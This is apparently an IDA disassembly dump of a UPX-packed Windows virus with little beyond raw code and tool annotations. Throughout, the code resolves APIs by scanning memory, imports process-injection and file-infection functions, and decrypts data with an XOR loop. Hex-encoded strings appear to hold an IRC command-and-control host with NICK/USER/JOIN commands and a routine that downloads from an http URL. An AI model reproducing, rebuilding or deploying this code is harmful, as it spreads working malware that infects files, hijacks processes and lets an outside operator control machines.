loc_311082FF: ; CODE XREF: UPX1:31108324�j
cmp al, 1
ja short loc_311082FA
cmp byte ptr [edi], 1
jnz short loc_311082FA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_311082FF
lea edi, [esi+6000h]
loc_3110832C: ; CODE XREF: UPX1:3110834E�j
mov eax, [edi]
or eax, eax
jz short loc_31108377
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+808Ch]
xchg eax, ebp
loc_31108349: ; CODE XREF: UPX1:3110836F�j
mov al, [edi]
inc edi
or al, al
jz short loc_3110832C
mov ecx, edi
jns short near ptr loc_3110835A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_3110835A: ; CODE XREF: UPX1:31108352�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+8090h]
or eax, eax
jz short loc_31108371
mov [ebx], eax
add ebx, 4
jmp short loc_31108349
; ---------------------------------------------------------------------------
loc_31108371: ; CODE XREF: UPX1:31108368�j
call dword ptr [esi+8094h]
loc_31108377: ; CODE XREF: UPX1:31108330�j
popa
jmp loc_31102DE4
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31109000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C1BF18h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB428Ah, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 74610000h
dd 696Fh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
db 90h
; ---------------------------------------------------------------------------
call $+5
inc ecx
mov eax, [esp]
test dword ptr [eax+2384h], 80000000h
mov [eax+2900h], ebx
mov ebx, [esp+4]
jz short loc_3110924D
cld
pop ecx
mov [eax+2904h], esi
mov [eax+2908h], edi
cmp byte ptr [eax+2388h], 0E8h
jnz short loc_31109244
add ebx, [eax+2389h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_3110924C
; ---------------------------------------------------------------------------
loc_31109244: ; CODE XREF: UPX2:31109235�j
mov ebx, [eax+238Ah]
push dword ptr [ebx]
loc_3110924C: ; CODE XREF: UPX2:31109242�j
pop ebx
loc_3110924D: ; CODE XREF: UPX2:3110921E�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 0FE6h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+403394h]
mov ecx, 79h
rep movsb
loc_31109275: ; CODE XREF: UPX2:31109291�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_3110928B
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_31109293
loc_3110928B: ; CODE XREF: UPX2:3110927C�j
sub ebx, 100h
jnz short loc_31109275
loc_31109293: ; CODE XREF: UPX2:31109289�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_311092A1: ; CODE XREF: UPX2:loc_311092BF�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_311092BF
cmp dword ptr [eax+3], 636F7250h
jnz short loc_311092BF
cmp dword ptr [eax+7], 72646441h
jz short loc_311092C4
loc_311092BF: ; CODE XREF: UPX2:311092AB�j
; UPX2:311092B4�j
loop loc_311092A1
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_311092C4: ; CODE XREF: UPX2:311092BD�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_311092EA+2
inc ebx
insb
outsd
jnb short near ptr loc_31109348+2
dec eax
popa
outsb
db 64h
insb
loc_311092EA: ; CODE XREF: UPX2:311092DB�p
add gs:[ebx-1], dl
setalc
mov [ebp+403494h], eax
call near ptr loc_31109306+1
inc ebx
jb short near ptr loc_31109361+1
popa
jz short near ptr loc_31109361+4
inc ebp
jbe short near ptr loc_31109367+1
outsb
jz short near ptr loc_31109345+2
loc_31109306: ; CODE XREF: UPX2:311092F5�p
add [ebx-1], dl
setalc
mov [ebp+403498h], eax
call sub_31109322
inc edi
db 65h
jz short near ptr loc_31109361+4
popa
jnb short loc_31109390
inc ebp
jb short near ptr loc_31109390+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_31109322 proc near ; CODE XREF: UPX2:31109310�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 311093CB SIZE 0000008D BYTES
; FUNCTION CHUNK AT 311094E7 SIZE 0000013C BYTES
push ebx
call esi ; lstrcatA
mov [ebp+40349Ch], eax
call sub_311093A0
test eax, eax
jz short loc_31109355
push eax
call dword ptr [ebp+40349Ch]
test eax, eax
jnz short loc_3110934F
lea eax, [ebp+4011CBh]
loc_31109345: ; CODE XREF: UPX2:31109304�j
mov dl, [eax-1]
loc_31109348: ; CODE XREF: UPX2:311092E3�j
call sub_311093BB
jmp short loc_311093CB
; ---------------------------------------------------------------------------
loc_3110934F: ; CODE XREF: sub_31109322+1B�j
; sub_31109322+112�j ...
call dword ptr [ebp+403494h]
loc_31109355: ; CODE XREF: sub_31109322+10�j
test dword ptr [ebp+40338Ah], 80000000h
jz short loc_3110937F
loc_31109361: ; CODE XREF: UPX2:311092FB�j
; UPX2:311092FE�j ...
lea esi, [ebp+40338Eh]
loc_31109367: ; CODE XREF: UPX2:31109301�j
mov edi, [esp+8+var_4]
movsb
movsd
mov ebx, [ebp+403906h]
mov esi, [ebp+40390Ah]
mov edi, [ebp+40390Eh]
loc_3110937F: ; CODE XREF: sub_31109322+3D�j
pop ebp
retn
sub_31109322 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_31109381: ; CODE XREF: sub_311093A0+2�p
; sub_31109322:loc_31109568�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_31109390: ; CODE XREF: UPX2:3110931A�j
; UPX2:3110931D�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 10h
; =============== S U B R O U T I N E =======================================
sub_311093A0 proc near ; CODE XREF: sub_31109322+9�p
xor ecx, ecx
call loc_31109381
lea edx, [ebp+40119Ah]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403498h]
add esp, 20h
retn
sub_311093A0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_311093BB proc near ; CODE XREF: sub_31109322:loc_31109348�p
mov dh, dl
mov ecx, 21BFh
loc_311093C2: ; CODE XREF: sub_311093BB+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_311093C2
retn
sub_311093BB endp
; ---------------------------------------------------------------------------
db 44h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31109322
loc_311093CB: ; CODE XREF: sub_31109322+2B�j
and dword ptr [ebp+401554h], 0
and dword ptr [ebp+401558h], 0
and dword ptr [ebp+40155Ch], 0
push edi
mov byte ptr [ebp+4012D8h], 1
mov [ebp+4034A0h], esi
lea esi, [ebp+401596h]
xor ecx, ecx
lea edi, [ebp+4034B0h]
mov cl, 1Eh
call sub_31109764
pop edi
call dword ptr [ebp+4034ECh]
shr eax, 1Fh
jz loc_311094E7
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+4034A8h], eax
push 6922h
push 0
call dword ptr [ebp+403520h]
test eax, eax
jz loc_3110934F
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 0A49h
sub ebp, 401000h
lea edx, [ebp+401258h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_31109322
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A18h]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+4034A8h]
add esp, 20h
test eax, eax
jz loc_3110934F
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+4034A8h]
test eax, eax
jz loc_3110934F
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+4034A8h]
push 1000Ah
call dword ptr [ebp+4034A8h]
call sub_311094D7
jmp loc_3110934F
; =============== S U B R O U T I N E =======================================
sub_311094D7 proc near ; CODE XREF: UPX2:311094CD�p
; sub_311094D7+D�j
push 1
pop ecx
jecxz short locret_311094E6
push 0Ah
call dword ptr [ebp+403514h]
jmp short sub_311094D7
; ---------------------------------------------------------------------------
locret_311094E6: ; CODE XREF: sub_311094D7+3�j
retn
sub_311094D7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31109322
loc_311094E7: ; CODE XREF: sub_31109322+EB�j
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
cmp dword ptr [ebp+4034C8h], 0
jz loc_3110934F
call near ptr loc_31109500+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_31109500: ; CODE XREF: sub_31109322+1D4�p
add bh, bh
xchg eax, ebp
loopne loc_31109539
inc eax
add [ebp+40174EB5h], cl
add [ebx], dh
leave
lea edi, [ebp+403528h]
mov cl, 0Bh
xchg eax, ebx
call sub_31109764
cmp dword ptr [ebp+403550h], 0
jz loc_3110934F
mov eax, [ebp+40352Ch]
push dword ptr [eax+1]
pop dword ptr [ebp+4032EEh]
loc_31109539: ; CODE XREF: sub_31109322+1E1�j
mov eax, [ebp+403540h]
push dword ptr [eax+1]
pop dword ptr [ebp+40333Bh]
mov eax, [ebp+403530h]
push dword ptr [eax+1]
pop dword ptr [ebp+403342h]
mov ecx, [ebp+403534h]
jecxz short loc_31109568
push dword ptr [ecx+1]
pop dword ptr [ebp+40334Fh]
loc_31109568: ; CODE XREF: sub_31109322+23B�j
call loc_31109381
lea edi, [ebp+4035A6h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+401577h]
mov ecx, 1Fh
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_311095AD: ; CODE XREF: sub_31109322+28E�j
lodsb
stosw
loop loc_311095AD
push 0
push 6922h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+403538h]
pop eax
add esp, 40h
push 6922h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 6922h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+40353Ch]
pop edi
pop ecx
test edi, edi
jz loc_3110934F
lea esi, [ebp+401000h]
mov ecx, 0A49h
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+401423h]
jmp eax
; END OF FUNCTION CHUNK FOR sub_31109322
; ---------------------------------------------------------------------------
db 8Dh
dd 4018BB95h, 95FF5200h, 4034F4h, 16E8h, 6F6F4C00h, 5070756Bh
dd 69766972h, 6567656Ch, 756C6156h, 50004165h, 34A095FFh
dd 85890040h, 4034A4h, 206A5450h, 95FFFF6Ah, 403544h, 755FC085h
dd 26A963Fh, 0D48B5656h, 0E852016Ah, 11h, 65446553h, 50677562h
dd 69766972h, 6567656Ch, 95FF5600h, 4034A4h, 5656C48Bh
dd 57565056h, 352895FFh, 0C4830040h, 95FF5710h, 403494h
dd 26A006Ah, 34C895FFh, 28B90040h, 97000001h, 0C89E12Bh
dd 0FF575424h, 40350495h, 83F63300h, 403594A5h, 57540000h
dd 350895FFh, 0C0850040h, 83465C74h, 0EE7204FEh, 82474FFh
dd 2A6A006Ah, 350095FFh, 0C0850040h, 0E893DC74h, 441h
dd 0E391C933h, 94853930h, 75004035h, 1DC18128h, 5000000Dh
dd 51565054h, 0FF535050h, 4034C095h, 59C08500h, 74FF0F74h
dd 858F0824h, 403594h, 0FFFDAAE8h, 95FF53FFh, 403494h
dd 0C48198EBh, 128h, 9495FF57h, 0E9004034h, 0FFFFFC07h
dd 585858h, 2922h, 0CD4h, 3 dup(0)
dd 238Ah
; =============== S U B R O U T I N E =======================================
sub_31109764 proc near ; CODE XREF: sub_31109322+DC�p
; sub_31109322+1F6�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+4034A0h]
stosd
pop ecx
loc_3110976F: ; CODE XREF: sub_31109764+E�j
lodsb
test al, al
jnz short loc_3110976F
loop sub_31109764
retn
sub_31109764 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32Map_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_31109B02 proc near ; CODE XREF: sub_31109B39+70�p
; sub_31109B39+81�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+403548h]
add esp, 0Ch
call dword ptr [ebp+40354Ch]
add esp, 8
retn
sub_31109B02 endp
; =============== S U B R O U T I N E =======================================
sub_31109B39 proc near ; CODE XREF: UPX2:3110B579�p
push edi
lea eax, [ebp+401589h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4034FCh]
test eax, eax
jz loc_31109BE5
push eax
push 6922h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 6922h
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+40353Ch]
pop edi
pop ecx
call dword ptr [ebp+403494h]
test edi, edi
jz short loc_31109BE5
mov ecx, [ebp+40155Ch]
jecxz short loc_31109B9D
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_31109B9D: ; CODE XREF: sub_31109B39+56�j
mov eax, [ebp+40352Ch]
lea ecx, [edi+22EDh]
call sub_31109B02
mov eax, [ebp+403540h]
lea ecx, [edi+233Ah]
call sub_31109B02
mov eax, [ebp+403530h]
lea ecx, [edi+2341h]
call sub_31109B02
mov eax, [ebp+403534h]
test eax, eax
jz short loc_31109BE5
lea ecx, [edi+234Eh]
call sub_31109B02
loc_31109BE5: ; CODE XREF: sub_31109B39+16�j
; sub_31109B39+4E�j ...
mov eax, edi
pop edi
retn
sub_31109B39 endp
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 4019EFh
xor ecx, ecx
lea eax, [ebp+401D1Dh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+4034C4h]
xchg eax, [esp]
call dword ptr [ebp+403494h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401A1EEDh, 8DFF6A00h, 4019E995h
dd 0CD525000h, 2A002420h, 0CC48300h, 2F85C766h, 0CD00401Ah
dd 3185C720h, 2400401Ah, 5D002A00h, 581A6AC3h, 9E8h, 61428D00h
dd 75C9FEAAh, 9569C3F0h, 40359Eh, 8088405h, 9E958942h
dd 0F7004035h, 0E855C3E2h, 0
dd 78ED815Dh, 8B00401Ah, 4035A29Dh, 247C8300h, 840F0008h
dd 0B9h, 208EC81h, 68540000h, 104h, 34E895FFh, 0FC8B0040h
dd 424848Dh, 50000001h, 4E8006Ah, 56000000h, 57005452h
dd 34E495FFh, 0C9330040h, 104978Dh, 51510000h, 6A51026Ah
dd 6801h, 0FF524000h, 4034B495h, 0F6859600h, 54505B74h
dd 10468h, 0B4FF5700h, 22024h, 8095FF00h, 59004035h, 1674C085h
dd 8B5014E3h, 52006AD4h, 0FF565751h, 40352495h, 0C0855900h
dd 0FF56D075h, 40349495h, 44578D00h, 446A5752h, 4978D58h
dd 0AB000001h, 106AC033h, 50ABF359h, 50505050h, 0FF525050h
dd 4034BC95h, 8C48100h, 0FF000002h, 0FF082474h, 40357095h
dd 95FF5300h, 403570h, 4C25Dh, 750A3E80h, 8D8B4601h, 401558h
dd 958D19E3h, 401000h, 0FF56D103h, 0FC084D2h, 11F88h, 10840F00h
dd 80000001h, 10753A3Eh, 3E8046h, 101840Fh, 3E800000h
dd 46F17520h, 49503E81h, 4275474Eh, 46C6CF8Bh, 0CE2B4F01h
dd 51006A51h, 95FF5356h, 403568h, 0FC13B59h, 0DF85h, 11858D00h
dd 6A00401Dh, 0C6800h, 53500000h, 356895FFh, 0C3D0040h
dd 0F000000h, 0BF85h, 0B1E900h, 3E810000h, 56495250h, 0A5850Fh
dd 0C6830000h, 0D3CAC08h, 99840Fh, 203C0000h, 3CACF375h
dd 8C850F3Ah, 0AD000000h, 2020200Dh, 67213D20h, 7F757465h
dd 75203CACh, 0FF7E817Ch, 74746820h, 7E817175h, 2F3A7003h
dd 0C668752Fh, 0F00FF47h, 2710BA31h, 0E2F70000h, 1495FF52h
dd 33004035h, 505050C0h, 9E850h, 6F440000h, 6F6C6E77h
dd 0FF006461h, 40357895h, 74C08500h, 89C93336h, 4035A285h
dd 685100h, 51800002h, 0FF505651h, 40357C95h, 72958D00h
dd 5000401Ah, 5154C933h, 51515250h, 34C495FFh, 4870040h
dd 9495FF24h, 0F8004034h, 4B8D80C3h, 1004015h, 4F53C3F9h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
dd 0F0FF0002h, 0D08F7255h, 786F7270h, 692E6D69h, 61676372h
dd 7978616Ch, 6C702Eh, 4B43494Eh, 677A7120h, 62787773h
dd 53550A6Ah, 71205245h, 35303230h, 2E203130h, 3A202E20h
dd 494F4A2Dh, 7626204Eh, 75747269h, 0E8550Ah, 5D000000h
dd 1D23ED81h, 85C60040h, 40154Bh, 0EC95FF00h, 0C1004034h
dd 3C741FE8h, 0B58B1E6Ah, 4034A8h, 2E3CAC59h, 81662A75h
dd 751DFF3Eh, 98BD8D23h, 8B004035h, 0A5570276h, 858DA566h
dd 4032C3h, 32E9858Fh, 89FA0040h, 4E8CFA46h, 1B1FBFEh
dd 32EBCFE2h, 1589858Dh, 6A500040h, 0FF0E6A00h, 4034FC95h
dd 247C8300h, 1A750408h, 4E8h, 43465300h, 0E095FF00h, 6A004034h
dd 95FF5002h, 4034A0h, 0F1E8D0FFh, 0FFFFFFF3h, 4012D88Dh
dd 0BE800h, 53550000h, 32335245h, 4C4C442Eh, 0F495FF00h
dd 0E8004034h, 0Ah, 72707377h, 66746E69h, 0FF500041h, 4034A095h
dd 0AC858900h, 0F004034h, 0BB8D8D31h, 89004018h, 40359E85h
dd 95FF5100h, 4034F4h, 46893h, 0B58D0000h, 4018C8h, 84BD8D59h
dd 0E8004035h, 0FFFFF750h, 0D685C766h, 0FF00401Ch, 0D8A583F0h
dd 401Ch, 1C96958Dh, 54500040h, 6A016Ah, 26852h, 95FF8000h
dd 403588h, 755AC085h, 0C98D8D22h, 5200401Ch, 0B58D066Ah
dd 401CD6h, 50505654h, 95FF5251h, 40358Ch, 8495FF58h, 0C6004035h
dd 4037A585h, 0CE80000h, 57000000h, 4B434F53h, 442E3233h
dd 0FF004C4Ch, 4034F495h, 7689300h, 8D000000h, 40181FB5h
dd 0BD8D5900h, 403554h, 0FFF6CBE8h, 0CE8FFh, 49570000h
dd 454E494Eh, 4C442E54h, 95FF004Ch, 4034F4h, 840FC085h
dd 1E7h, 56893h, 0B58D0000h, 40185Dh, 70BD8D59h, 0E8004035h
dd 0FFFFF694h, 3574BD83h, 0F000040h, 1C284h, 90EC8100h
dd 54000001h, 10168h, 5495FF00h, 81004035h, 190C4h, 0D48B5000h
dd 0FF52006Ah, 40357495h, 59C08500h, 88680D75h, 0FF000013h
dd 40351495h, 83E2EB00h, 401CD8BDh, 29750000h, 1CDC858Dh
dd 0FF500040h, 40356095h, 0FC08500h, 13B84h, 0C408B00h
dd 30FF008Bh, 1CD8858Fh, 85C60040h, 4037A5h, 6A006A01h
dd 0FF026A01h, 40356C95h, 0FFF88300h, 112840Fh, 8D930000h
dd 401CD495h, 52106A00h, 5C95FF53h, 85004035h, 0F2850FC0h
dd 8D000000h, 401CF5BDh, 0E808B100h, 0FFFFFACDh, 9468h
dd 0E62B5E00h, 54243489h, 34F095FFh, 0BD8D0040h, 401D03h
dd 0AEE801B1h, 8BFFFFFAh, 0C1102444h, 440B08E0h, 0E0C10424h
dd 24440B08h, 5E85008h, 25000000h, 78362Eh, 0AC95FF57h
dd 83004034h, 47C60CC4h, 958D2006h, 401CF0h, 2168006Ah
dd 52000000h, 6895FF53h, 8D004035h, 5714247Ch, 34B095FFh
dd 4C60040h, 6A400A38h, 53575000h, 356895FFh, 0E6030040h
dd 1D11BD8Dh, 6A0040h, 0C68h, 0FF535700h, 40356895h, 0C3D00h
dd 4D750000h, 35A6B58Dh, 8D8D0040h, 4037A5h, 6ACE2Bh, 0FF535651h
dd 40356495h, 0F88300h, 8B912F7Eh, 0A6B58DFEh, 0B0004035h
dd 75AEF20Dh, 9E86010h, 61FFFFFBh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 0A6BD8DCEh, 0F3004035h, 0EBF787A4h, 95FF53B9h
dd 403558h, 154BBD80h, 74010040h, 7530682Ah, 95FF0000h
dd 403514h, 37A5BD80h, 74000040h, 0D885C711h, 401Ch, 0C6000000h
dd 4037A585h, 56E90000h, 0C7FFFFFEh, 40155485h, 0
dd 4C25D80h, 540A0D00h, 67206568h, 6963616Ch, 73277265h
dd 61726720h, 64612079h, 656E726Fh, 74692064h, 666C6573h
dd 726F6620h, 756F7920h, 20200A0Dh, 54202020h, 7961646Fh
dd 74697720h, 6F722068h, 3B736573h, 68540A0Dh, 72622065h
dd 206B6F6Fh, 6B656573h, 6F792073h, 61202C75h, 6620646Eh
dd 206C6C75h, 6C20666Fh, 69676E6Fh, 7220676Eh, 73657369h
dd 68540A0Dh, 69772065h, 202C646Eh, 20656874h, 756F6C63h
dd 69202C64h, 206F746Eh, 20656874h, 6C756176h, 676E6974h
dd 756C6220h, 540A0D65h, 6F6C206Fh, 66206B6Fh, 7920726Fh
dd 6620756Fh, 206D6F72h, 7A7A6964h, 69622079h, 73276472h
dd 6579652Dh, 65697620h, 0A0D2E77h, 8352B2E8h, 3AAB5957h
dd 50B7AB4h, 4CA2A1A8h, 10A61429h, 67D80B85h, 40375248h
dd 0C89FCC00h, 18h dup(0)
; =============== S U B R O U T I N E =======================================
sub_3110A3FC proc near ; CODE XREF: sub_3110A4B2:loc_3110A4A0�p
; sub_3110A503+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4038FAh], 0
and dword ptr [ebp+4038FEh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3110A418: ; CODE XREF: sub_3110A3FC+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3110A43A
cmp eax, [edx+8]
jnb short loc_3110A43A
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4038FAh], edx
mov [ebp+4038FEh], eax
jmp short loc_3110A43F
; ---------------------------------------------------------------------------
loc_3110A43A: ; CODE XREF: sub_3110A3FC+23�j
; sub_3110A3FC+28�j
add edx, 28h
loop loc_3110A418
loc_3110A43F: ; CODE XREF: sub_3110A3FC+3C�j
popa
retn 4
sub_3110A3FC endp
; ---------------------------------------------------------------------------
mov [ebp+40224Fh], al
call sub_3110A4B2
push 20h
lea eax, [ebp+40217Ch]
pop ecx
loc_3110A45A: ; CODE XREF: UPX2:3110A461�j
cmp [eax], ebx
jz short loc_3110A46A
add eax, 4
loop loc_3110A45A
inc dword ptr [ebp+4038E2h]
retn
; ---------------------------------------------------------------------------
loc_3110A46A: ; CODE XREF: UPX2:3110A45C�j
neg ecx
add ecx, [ebp+40224Fh]
jecxz short loc_3110A484
loc_3110A474: ; CODE XREF: UPX2:3110A47C�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3110A474
mov [ebp+40217Ch], ebx
; START OF FUNCTION CHUNK FOR sub_3110A4B2
loc_3110A484: ; CODE XREF: UPX2:3110A472�j
; sub_3110A4B2+34�j
cmp dword ptr [edx], 0
jz short loc_3110A48E
sub esi, [edx]
add esi, [edx+10h]
loc_3110A48E: ; CODE XREF: sub_3110A4B2-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3110A49D
push dword ptr [edx]
jmp short loc_3110A4A0
; ---------------------------------------------------------------------------
loc_3110A49D: ; CODE XREF: sub_3110A4B2-1B�j
push dword ptr [edx+10h]
loc_3110A4A0: ; CODE XREF: sub_3110A4B2-17�j
call sub_3110A3FC
sub ecx, esi
sub ecx, [ebp+4038FEh]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_3110A4B2
; =============== S U B R O U T I N E =======================================
sub_3110A4B2 proc near ; CODE XREF: UPX2:3110A449�p
; FUNCTION CHUNK AT 3110A484 SIZE 0000002E BYTES
pop dword ptr [ebp+4038E6h]
mov dword ptr [ebp+4038E2h], 0
call sub_3110A503
mov eax, [ebp+4038E2h]
call near ptr dword_31109C18+46h
call sub_3110A4EF
cmp dword ptr [ebp+4038E2h], 0
jnz short loc_3110A4E8
mov [ebp+4021F8h], ebx
jmp short loc_3110A484
; ---------------------------------------------------------------------------
loc_3110A4E8: ; CODE XREF: sub_3110A4B2+2C�j
dec dword ptr [ebp+4038E2h]
retn
sub_3110A4B2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
